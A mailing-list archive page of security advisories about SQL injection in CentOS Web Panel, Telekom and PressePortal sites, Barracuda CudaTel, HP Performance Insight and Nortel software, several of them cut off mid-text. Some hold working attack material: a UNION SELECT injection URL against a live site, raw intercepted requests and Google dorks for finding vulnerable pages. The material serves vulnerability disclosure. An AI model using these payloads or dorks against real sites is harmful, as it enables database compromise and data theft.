CentOS Web Panel v0.9.8.12 - Remote SQL Injection Vulnerabilities

2018-01-22 Thread Vulnerability Lab
Document Title:
===
CentOS Web Panel v0.9.8.12 - Remote SQL Injection Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1833


Release Date:
=
2018-01-22


Vulnerability Laboratory ID (VL-ID):

1833


Common Vulnerability Scoring System:

7.5


Vulnerability Class:

SQL Injection


Current Estimated Price:

4.000€ - 5.000€


Product & Service Introduction:
===
CentOS Web Panel - Free Web Hosting control panel is designed for quick and 
easy management of (Dedicated & VPS) servers without of 
need to use ssh console for every little thing. There is lot's of options and 
features for server management in this control panel.
CWP automatically installs full LAMP on your server (apache,php, phpmyadmin, 
webmail, mailserver…).

(Copy of the Homepage: http://centos-webpanel.com/features )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a remote 
sql-injection web vulnerability in the CentOS Web Panel v0.9.8.12.


Vulnerability Disclosure Timeline:
==
2018-01-22: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

CWP
Product: CentOS Web Panel - (CWP) 0.9.8.12


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:
========
A remote sql-injection web vulnerability has been discovered in the official 
CentOS Web Panel v0.9.8.12 web-application.
The vulnerability allows remote attackers to inject own malicious sql commands 
to compromise the connected web-server or dbms.

The sql-injection vulnerability is located in the `row_id` and `domain` value 
of the `Add a domain` module POST method request.
Remote attackers are able to manipulate the POST method request to execute own 
malicious sql commands on the application-side 
of the web-application. The request method to inject is POST and the attack 
vector is application-side. The vulnerability can 
be exploited by restricted user accounts against the web-application 
administrator. 

The security risk of the sql-injection vulnerability is estimated as high with 
a cvss (common vulnerability scoring system) count of 7.5.
Exploitation of the remote sql injection vulnerability requires no user 
interaction and only a low privileged web-application user account.
Successful exploitation of the remote sql injection results in database 
management system, web-server and web-application compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Add a domain

Vulnerable Parameter(s):
[+] row_id
[+] domain

Affected Module(s):
[+] Delete domain


Proof of Concept (PoC):
===
The remote sql-injecton vulnerability can be exploited by remote attackers with 
low privilege user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Add a domain
2. Delete the same domain
3. Intercept the http request with a session tamper
4. Manipulate in the POST method request the values `row_id` or `domain` with '
5. Continue the request and an exploitable sql-exception becomes visible
6. Now the attacker can inject to the row_id and domain to execute malicious 
sql commands via restricted user account
7. Successful reproduce of the sql-injection vulnerability!


--- SQL Error Exceptions ---
You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near 'test-domain'' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given 
in 
/usr/local/cwpsrv/htdocs/resources/admin/include/functions.php(1) : eval()'d 
code(1) : eval()'d code on line 5


--- PoC Session logs [POST] ---
Status: 200[OK]
POST http://cwp.localhost:2030/index.php?module=list_domains 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des 
Inhalts[-1] Mime Type[text/html]
   Request Header:
  Host[185.4.149.65:2030]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 
Firefox/45.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  Referer[http://cwp.localhost:2030/index.php?module=list_domains]
  Cookie[cwpsrv-b66ec0f9742b8f4bd3407e0151cd756c=ae0c56ru1ver0k3d0cd1hh4147]
  Connection[keep-alive]
   POST-Daten:
  ifpost[yes]
  username[test-dom]
  domain[SQL-INJECTION PAYLOAD!]
  row_id[SQL-INJECTION PAYLOAD!]
   Response Header:
  Date

German Telekom Bug Bounty #11 - Remote SQL Injection Vulnerability

2014-02-06 Thread Vulnerability Lab
Document Title:
===
German Telekom Bug Bounty #11 - SQL Injection Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1177

Dev Article: 
http://www.vulnerability-db.com/dev/index.php/2014/02/06/german-telekom-bug-bounty-3x-remote-vulnerabilities/

Exclusive News: 
http://news.softpedia.com/news/Expert-Finds-SQL-Injection-and-RCE-Vulnerabilities-in-Deutsche-Telekom-Systems-424518.shtml


Release Date:
=
2014-02-06


Vulnerability Laboratory ID (VL-ID):

1177


Common Vulnerability Scoring System:

8.3


Product  Service Introduction:
===
Deutsche Telekom AG (English: German Telecom) is a German telecommunications 
company headquartered in Bonn, 
North Rhine-Westphalia, Germany. Deutsche Telekom was formed in 1996 as the 
former state-owned monopoly 
Deutsche Bundespost was privatized. As of June 2008, the German government 
still holds a 15% stake in company 
stock directly, and another 17% through the government bank KfW.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Deutsche_Telekom
http://www.telekom.com/bug-bounty  )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered a remote SQL Injection 
web vulnerability in the official Telekom website web-application.


Vulnerability Disclosure Timeline:
==
2013-12-30: Researcher Notification  Coordination (Ibrahim Mosaad El-Sayed)
2013-12-30: Vendor Notification (Telekom CERT Security Team)
2014-01-02: Vendor Response/Feedback (Telekom CERT Security Team)
2014-01-24: Vendor Fix/Patch (Telekom Developer Team - Reward 1000€)
2014-02-06: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Critical


Technical Details  Description:

A remote SQL Injection web vulnerability has been discovered in the official 
Telekom (English) Fitness Check website web application.
The vulnerability allows remote attackers to inject unauthorized own sql 
statements to compromise the affected web-application or dbms.

The sql injection vulnerability is located in `englishtest2004/test.asp` file 
of the englishtest2004 module (path). After executing 
the query through the test.asp page, the query`s result can be seen from a `500 
error` returned by the `test.asp` page. The connected 
vulnerable parameter in the `test.aspx` file is `mailbody` that is passed 
through the POST method request. The SQL injection bug is in 
the INSERT statement. Other paramaters like VORNAME, Email, PLZ, TELEFON can be 
accessed by usage of a malicious insert statement. 

The security risk of the sql injection vulnerability is estimated as critical 
with a cvss (common vulnerability scoring system) count of 8.3(+).

Exploitation of the remote sql injection web vulnerability requires NO user 
interaction or a privileged web-application user account.
Successful exploitation of the remote pre-auth sql injection results in dbms, 
web-server and web-application (context) compromise.

Vulnerable Module(s):
[+] /englishtest2004/

Vulnerable File(s):
[+] /englishtest2004/test.asp

Vulnerable Parameter(s):
[+] mailbody


Proof of Concept (PoC):
===
The SQL injection vulnerability can be exploited by remote attackers without 
privileged application user account and without required user inter action. For 
demonstration or reproduce ...

a) The attacker should visit the main page to take the test
https://gt.telekom.de/englishtest2004eng/html/intro.htm
b) The attacker should keep clicking on next until he reaches the final step in 
the test which is the page of  Registration for the Fitness Check
c) In the form of registering the test, we have many fields.
We fill the  up the vulnerable fields and then click on Register button

d) The attacker then should intercept the request and edit the mailbody 
paremter to an apsrophe that will generate the SQL error 

e) After forwarding the request, we will find the SQL error in the INSERT 
statement echoed back in the page

The post request that has been used to reproduce the image is:

POST /englishtest2004/test.asp HTTP/1.1
Host: gt.telekom.de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) 
Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://gt.telekom.de/englishtest2004/html/intro_11.htm
Cookie: _ga=GA1.2.1524944686.1388633141; 
ASPSESSIONIDQAQRBTRB=PJJNFNFCCPEDGGLMFOGEGNGK
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content

NewsAktuell PressePortal DE - Remote SQL Injection Web Vulnerability

2013-11-29 Thread Vulnerability Lab
Document Title:
===
NewsAktuell PressePortal DE - Remote SQL Injection Web Vulnerability


References (Source):

http://vulnerability-lab.com/get_content.php?id=1150

Lab News Article: http://www.vulnerability-lab.com/news/get_news.php?id=115


Release Date:
=
2013-11-28


Vulnerability Laboratory ID (VL-ID):

1150


Common Vulnerability Scoring System:

8.7


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered a critical SQL Injection 
web vulnerability in the official News-Aktuell - PressePortal website 
web-application.


Vulnerability Disclosure Timeline:
==
2013-04-26: Researcher Notification  Coordination (Marco Onorati)
2013-05-01: Vendor Notification (PressePortal Team)
2013-11-28: Vendor Response/Feedback(PressePortal Team)
2013-11-28: Vendor Fix/Patch (PressePortal Developer Team)
2013-11-29: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Critical


Technical Details  Description:

A remote sql injection web vulnerability has been discovered in the official 
News-Aktuell - PressePortal website web-application.
The vulnerability allows remote attacker to execute own sql commands by usage 
of a vulnerable application value GET method request.

The vulnerability is located in the `../services/content` module with the 
vulnerable iframe.htx file. Remote attackers are able 
to inject own sql commands by usage of the vulnerable `id` parameter. After the 
inject the website returns with a a obviously 
blank page but when you watch the source the execute is in the listed rss and 
context values. The issue is a classic remote sql 
injection. The security risk of the remote sql injection web vulnerability is 
estimated as critical with a cvss (common vulnerability 
scoring system) count of 8.7(+).

Exploitation of the sql injection web vulnerability requires no privileged web 
application user account and also no user interaction. 
Successful exploitation of the vulnerability results in web application 
(website), account system  dbms compromise.

Vulnerable Module(s):
[+] services/content

Vulnerable File(s):
[+] iframe.htx

Vulnerable Parameter(s):
[+] id

Affected Domain(s):
[+] http://www.presseportal.de


Proof of Concept (PoC):
===
The remote sql injection web vulnerability can be exploited by remote attackers 
without user interaction and also without privileged 
web application user account. For security demonstration or to reproduce the 
vulnerability follow the provided information and steps below.



PoC: Remote SQL Injection
http://www.presseportal.de/services/content/iframe.htx?id=b17ea41fbd7d93bcdda63799dd904314%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,
44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20inc=true


-- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://www.presseportal.de/services/content/iframe.htx
?id=b17ea41fbd7d93bcdda63799dd904314%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,
23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20inc=true
 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[3145] Mime Type[text/html]
   

Request Headers:
Host[www.presseportal.de]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 
Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Cookie[PHPSESSID=emou1lkl2c3vin16agjg90eig1; 
PressePortalDeDst=portal6-pp.de; 
__utma=239002817.282394538.1385649109.1385649109.1385649109.1; 
__utmb=239002817.4.10.1385649109; __utmc=239002817; 
__utmz=239002817.1385649109.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 
__atuvc=2%7C48; POPUPCHECK=1385735515782]
Connection[keep-alive]
Cache-Control[max-age=0]
   

Response Headers:
Date[Thu, 28 Nov 2013 14:52:27 GMT]
Server[Apache]
X-Powered-By[PHP/5.3.27]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Content-Type[text/html]
Content-Length[3145]
Connection[Keep-alive]
Via[1.1 AN-0003011040777600]




Refernce(s):
http://www.presseportal.de/services/content/iframe.htx?id
https://www.presseportal.de/services/content/iframe.htx?id


Picture(s

Barracuda CudaTel 2.6.02.040 - Remote SQL Injection Vulnerability

2013-07-22 Thread Vulnerability Lab
Title:
==
Barracuda CudaTel 2.6.02.040 - Remote SQL Injection Vulnerability


Date:
=
2013-07-20


References:
===
http://vulnerability-lab.com/get_content.php?id=775

BARRACUDA NETWORK SECURITY ID: BNSEC-723


VL-ID:
=
775


Common Vulnerability Scoring System:

8.6


Introduction:
=
Designed to enable seamless voice and video communication, the CudaTel 
Communication Server is an easy-to-use, 
affordable, next-generation phone system for businesses. CudaTel Communication 
Server s enterprise-class 
feature set includes Voice over IP (VoIP) PBX services, conferencing, 
follow-me, automated attendant services, 
and more, controlled by an easy-to-use Web interface. CudaTel Communication 
Server is compatible with any SIP 
device and provider, and can be pre-configured for use with both analog and 
digital telephone networks. Powerful, 
Complete Solution With an expansive feature set and and no per user or phone 
licensing fees, the CudaTel 
Communication Server is equipped and priced for organizations of any size. 
Native High Definition audio support 
and integrated phone line (TDM) hardware produces an unparalleled audio 
experience. VOIP encryption protects calls 
from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )


Abstract:
=
1.1
The Vulnerability Laboratory Research Team discovered a sql injection 
vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.

1.2
The Vulnerability Laboratory Research Team discovered a client side 
vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.


Report-Timeline:

2012-11-26: Researcher Notification  Coordination (Benjamin Kunz Mejri)
2012-11-27: Vendor Notification (Barracuda Networks Security Team - Bug 
Bounty Program)
2012-12-01: Vendor Response/Feedback (Barracuda Networks Security Team - 
Bug Bounty Program)
2013-03-01: Vendor Fix/Patch (Barracuda Networks Developer Team) [Manager: 
Dave Farrow]
2013-07-20: Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

1.1
A SQL Injection vulnerability is detected in the Barracuda Networks CudaTel 
v2.6.002.040 appliance web application.
The vulnerability allows remote attackers or local low privilege application 
user accounts to inject (execute) 
own SQL commands to the affected application dbms. 

The blind sql injection vulnerability is located in the cdr module when 
processing to request manipulated row  page 
parameters as searchstring. A remote attacker can for example delete the 
standard value context of the module request 
to inject (execute) own sql commands. 

Eploitation of the vulnerability requires a low privilege web application user 
account and no user interaction.
Successful exploitation of the vulnerability results in datbase management 
system and web application compromise.

Vulnerable Section(s)
[+] search - listing

Vulnerable Module(s)
[+] cdr - seachstring listing

Vulnerable Parameter(s)
[+] row
[+] page



1.2
A client side input validation vulnerability is detected in the Barracuda 
Networks CudaTel v2.6.002.040 appliance web application.
The non-persistent vulnerability allows remote attackers to manipulate client 
side application requests to browser.

The secound vulnerability (client side) is located in the invalid value 
exception handling. Remote attackers can provoke the 
exception-handling by including invalid script code inputs to redisplay the 
malicious context when processing to load the output.
To provoke the exception-handling the remote attacker can use the vulnerable 
row parameter of the cdr searchstring listing to 
execute own malicious (client-side) script code.

Exploitation of the vulnerability requires a no web application user account 
but medium or high user interaction.
Successful exploitation of the vulnerability results in client side phishing, 
client side session hijacking and client side 
external redirects to malware or malicious websites. Exploitation requires 
medium user interaction.

Vulnerable Section(s):
[+] search - listing

Vulnerable Module(s):
[+] cdr - seachstring listing

Vulnerable Parameter(s):
[+] row

Affected Module(s):
[+] Exception-Handling (invalid value)


Proof of Concept:
=
1.1
The sql injection vulnerability can be exploited by remote attackers with low 
privilege web application user account and without user

[security bulletin] HPSBMU02775 SSRT100853 rev.2 - HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS), Privilege Elevat

2012-05-10 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03312417
Version: 2

HPSBMU02775 SSRT100853 rev.2 - HP Performance Insight for Networks Running on 
HP-UX, Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting 
(XSS), Privilege Elevation

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2012-05-07
Last Updated: 2012-05-09

Potential Security Impact: Remote SQL injection, cross site scripting (XSS), 
privilege elevation

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Performance 
Insight for Networks running on HP-UX, Linux, Solaris, and Windows. The 
vulnerabilities could be exploited remotely resulting in SQL injection, cross 
site scripting (XSS), and privilege elevation.

References: CVE-2012-2007 (SQL injection), CVE-2012-2008 (XSS), CVE-2012-2009 
(privilege elevation)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and 
Windows v5.3.x , v5.41, v5.41.001, v5.41.002

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2012-2007(AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
CVE-2012-2008(AV:N/AC:M/Au:N/C:N/I:P/A:N)   4.3
CVE-2012-2009(AV:N/AC:M/Au:S/C:C/I:P/A:N)   7.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made a hotfix available to resolve the vulnerabilities. The hotfix 
requires HP Performance Insight for Networks v5.41.002 (Patch 2). The hotfix is 
available from the normal HP Services support channel. Customers should open a 
support case to request 5.41.002 piweb HF09.

MANUAL ACTIONS: Yes - NonUpdate
Apply the 5.41.002 piweb HF09 hotfix if HP Performance Insight for Networks 
is installed.

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HP and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.31
HP-UX B.11.23
HP-UX B.11.11
=
action: apply 5.41.002 piweb HF09 or subsequent

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) - 7 May 2012 Initial release
Version:2 (rev.2) - 9 May 2012 Corrected CVE numbers in Background section 
(2011-2012)

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal HP Services support channel.  For other issues about 
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin 
alerts via Email: 
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, 
is contained in HP Security Notice HPSN-2011-001: 
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is 
available here: 
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the 
title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided as is 
without warranty of any kind. To the extent permitted by law, neither HP or its 
affiliates, subcontractors or suppliers will be liable for incidental,special 
or consequential damages including downtime cost; lost profits;damages relating 
to the procurement of substitute products or services; or damages for loss of 
data, or software restoration. The information in this document is subject to 
change without notice. Hewlett-Packard

[security bulletin] HPSBMU02775 SSRT100853 rev.1 - HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS), Privilege Elevat

2012-05-09 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03312417
Version: 1

HPSBMU02775 SSRT100853 rev.1 - HP Performance Insight for Networks Running on 
HP-UX, Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting 
(XSS), Privilege Elevation

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2012-05-07
Last Updated: 2012-05-07

Potential Security Impact: Remote SQL injection, cross site scripting (XSS), 
privilege elevation

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Performance 
Insight for Networks running on HP-UX, Linux, Solaris, and Windows. The 
vulnerabilities could be exploited remotely resulting in SQL injection, cross 
site scripting (XSS), and privilege elevation.

References: CVE-2012-2007 (SQL injection), CVE-2012-2008 (XSS), CVE-2012-2009 
(privilege elevation)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and 
Windows v5.3.x , v5.41, v5.41.001, v5.41.002

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2011-2007(AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
CVE-2011-2008(AV:N/AC:M/Au:N/C:N/I:P/A:N)   4.3
CVE-2011-2009(AV:N/AC:M/Au:S/C:C/I:P/A:N)   7.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made a hotfix available to resolve the vulnerabilities. The hotfix 
requires HP Performance Insight for Networks v5.41.002 (Patch 2). The hotfix is 
available by contact the normal HP Services channel and requesting 5.41.002 
piweb HF09.

MANUAL ACTIONS: Yes - NonUpdate
Apply the 5.41.002 piweb HF09 hotfix if HP Performance Insight for Networks 
is installed.

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HP and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.31
HP-UX B.11.23
HP-UX B.11.11
=
action: apply apply 5.41.002 piweb HF09 or subsequent

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) - 7 May 2012 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal HP Services support channel.  For other issues about 
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin 
alerts via Email: 
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, 
is contained in HP Security Notice HPSN-2011-001: 
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is 
available here: 
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the 
title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided as is 
without warranty of any kind. To the extent permitted by law, neither HP or its 
affiliates, subcontractors or suppliers will be liable for incidental,special 
or consequential damages including downtime cost; lost profits;damages relating 
to the procurement of substitute products or services; or damages for loss of 
data, or software restoration. The information in this document is subject to 
change without notice. Hewlett-Packard Company and the names of Hewlett-Packard 
products referenced herein are trademarks of Hewlett-Packard Company

Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration getSubKeys() Remote SQL Injection Exploit

2011-09-15 Thread nospam
?php
/*
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration 
Web Service getSubKeys() Remote SQL Injection Exploit

tested against:
Microsoft Windows Server 2003 r2 sp2
Microsoft SQL Server 2005 Express

download uri:
ftp://ftp.avaya.com/incoming/Up1cku9/tsoweb/web1/software/c/contactcenter/crqm/6_5_CS1K_2/Nortel-DVD3-Archive-6_5.iso

background:

This software installs a Tomcat http server which listens on
port 8080 for incoming connections. It exposes the
following servlet as declared inside
c:\Program Files\[choosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\web.xml :

..
   servlet-mapping
  servlet-nameEyrAPIConfiguration/servlet-name
  url-pattern/EyrAPIConfiguration/*/url-pattern
   /servlet-mapping
..

at the following url:

http://[host]:8080/EyrAPI/EyrAPIConfiguration/EyrAPIConfigurationIf


Vulnerability:

without prior authentication, you can reach a web service
with various methods availiable, as described inside
the associated wsdl, see file:

c:\Program Files\[choosen 
folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\EyrAPIConfiguration.wsdl 

among them, the getSubKeys() method.

Now look at getSubKeys() inside the decompiled
c:\Program Files\[choosen 
folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\com\eyretel\eyrapi\EyrAPIConfigurationImpl.class

:
..
 public String getSubKeys(boolean iterateSubKeys, boolean includeValues, String 
systemId, String componentId, String sysCompId, String userName)
throws RemoteException
{
StringBuffer xml;
ConfigOwnerId configOwnerId;
Connection conn;
PreparedStatement pStmt;
ResultSet rs;
PreparedStatement pStmt2;
ResultSet rs2;
log.info((new StringBuilder()).append(Request getSubKeys: 
iterateSubKeys=).append(iterateSubKeys).append(, 
includeValues=).append(includeValues).append(, 
SystemId=).append(systemId).append(, 
componentId=).append(componentId).append(, 
sysCompId=).append(sysCompId).append(, 
userName=).append(userName).toString());
xml = new StringBuffer(ConfigurationNodeList);
configOwnerId = null;
conn = null;
pStmt = null;
rs = null;
pStmt2 = null;
rs2 = null;
try
{
conn = SiteDatabase.getInstance().getConnection();
if(EyrAPIProperties.getInstance().getProperty(database, 
MSSQLServer).equalsIgnoreCase(Oracle))
{
if(componentId.compareToIgnoreCase() == 0)
componentId = *;
if(systemId.compareToIgnoreCase() == 0)
systemId = *;
if(sysCompId.compareToIgnoreCase() == 0)
sysCompId = *;
if(userName.compareToIgnoreCase() == 0)
userName = *;
pStmt = conn.prepareStatement((new 
StringBuilder()).append(SELECT ConfigOwnerID FROM ConfigOwnerView WHERE 
nvl(ComponentID, '*') = ').append(componentId).append(' AND 
).append(nvl(SystemID, '*') = ').append(systemId).append(' AND 
).append(nvl(SysCompID, '*') = ').append(sysCompId).append(' AND 
).append(nvl(UserName, '*') = ').append(userName).append(').toString());
rs = pStmt.executeQuery();
} else
{
pStmt = conn.prepareStatement((new 
StringBuilder()).append(SELECT ConfigOwnerID FROM ConfigOwnerView WHERE 
ISNULL(CONVERT(varchar(36), ComponentID), '') = 
').append(unpunctuate(componentId)).append(' AND 
).append(ISNULL(CONVERT(varchar(36), SystemID), '') = 
').append(unpunctuate(systemId)).append(' AND 
).append(ISNULL(CONVERT(varchar(36), SysCompID), '') = 
').append(unpunctuate(sysCompId)).append(' AND ).append(ISNULL(UserName, 
'') = ').append(unpunctuate(userName)).append(').toString());
rs = pStmt.executeQuery();
}
if(rs.next())
{
String strConfigOwnerId = rs.getString(1);
if(!rs.wasNull())
configOwnerId = new ConfigOwnerId(strConfigOwnerId);
pStmt2 = conn.prepareStatement((new 
StringBuilder()).append(SELECT ConfigGroupID, ConfigGroupName FROM 
ConfigGroupView WHERE ConfigOwnerID = 
').append(configOwnerId.toString()).append(').toString());
for(rs2 = pStmt2.executeQuery(); rs2.next(); 
xml.append(getSubKeyValuesInc(new Integer(rs2.getInt(1)), iterateSubKeys, 
includeValues)));
}
}
catch(SQLException e)
{
String msg = Unable to get subkeys;
log.error(msg, e);
throw new RemoteException(msg, e);
}
catch(GenericDatabaseException e)
{
String msg = Unable to get subkeys;
log.error(msg, e);
throw new RemoteException(msg, e);
}
DbHelper.closeStatement(log, pStmt);
DbHelper.closeResultSet(log, rs);
DbHelper.closeStatement(log, pStmt2);
DbHelper.closeResultSet(log, rs2

Loop (ricetta.php?id) Remote SQL injection Vulnerability

2011-09-06 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Loop (ricetta.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.loopmm.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Loop - creazioni multimediali inurl:ricetta.php?id=

Exploite:

www.victim.com/ricetta.php?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Manifattura Web (prodotto.php?id) Remote SQL injection Vulnerability

2011-09-06 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Manifattura Web (prodotto.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.manifatturaweb.it/
##  
## Persian Gulf 4 Ever!
#
#
